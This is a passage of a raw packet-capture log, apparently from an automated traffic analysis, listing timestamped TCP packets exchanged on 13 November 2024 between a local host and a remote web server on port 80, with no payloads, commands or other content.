                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618397951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618407965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618429899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618438959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618446112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618488073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618556976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618573904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618590117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618602037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618618965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618633032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618662119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618666887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618679047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618691921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618693113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618710995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618717909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618767977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618783951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618784904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618802071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618817091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618822098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618834019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618849993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618863106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618866920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618886948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618894100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618904114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618927956 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618952990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618968964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.618984938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619000912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619009018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619018078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619029999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619055033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619064093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619077921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619092941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619108915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619118929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619124889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619168997 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619184017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619200945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619216919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619225979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619235039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619254112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619306087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619329929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619347095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619362116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619373083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619379997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619391918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619396925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619412899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619447947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619463921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619481087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619496107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619507074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619525909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619555950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619571924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619586945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619601965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619611979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619635105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619642019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619657993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619673014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619690895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619699001 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619708061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619714975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619745970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619795084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619812012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619827032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619843006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619853020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619859934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619878054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619879961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619921923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619932890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619937897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619956017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619972944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.619999886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.620004892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.620021105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.620048046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.620065928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670085907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670120955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670137882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670152903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670166969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670181036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670197964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670200109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670217037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670233965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670239925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670250893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670267105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670269012 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670284033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670296907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670311928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670320034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670331001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670344114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670347929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670363903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670367002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670381069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670397043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670411110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670414925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.670438051 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701275110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701308012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701317072 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701325893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701343060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701359987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701375961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701386929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.701416016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710297108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710326910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710344076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710346937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710390091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710407019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710426092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710438967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710454941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710462093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710472107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710488081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710498095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.710524082 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711183071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711211920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711225033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711257935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711282015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711299896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711321115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711332083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.711391926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730796099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730818987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730849981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730863094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730865002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730881929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730912924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730914116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730931997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730957031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730972052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730973959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730992079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.730998039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731010914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731026888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731029034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731045961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731060028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731075048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731086016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731092930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731113911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731125116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731175900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731203079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731215954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731241941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731252909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731257915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731276989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731338024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731353045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731369019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731374979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731396914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731403112 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731415033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731532097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731949091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.731962919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732002020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732049942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732105017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732120991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732147932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732183933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732201099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732214928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732225895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732256889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732258081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732285976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732301950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732316971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732325077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732336044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732358932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732386112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732400894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732415915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732431889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732434988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732450008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732456923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732491970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732497931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732512951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732527018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732543945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732548952 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732561111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732582092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732609987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732628107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732650995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732719898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732733965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732748985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732762098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732775927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732790947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732791901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732810020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732824087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732826948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732841969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732857943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732873917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732882023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732891083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732901096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732908964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732923985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732930899 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732940912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732971907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.732994080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733011007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733026028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733031988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733042002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733061075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733067989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733074903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733088970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733097076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733113050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733128071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733143091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733146906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733170033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733185053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733201981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733216047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733222008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733316898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733333111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733333111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733350992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733366013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733381987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733387947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733397961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733406067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733414888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.733431101 CET804973342.96.10.8192.168.2.4
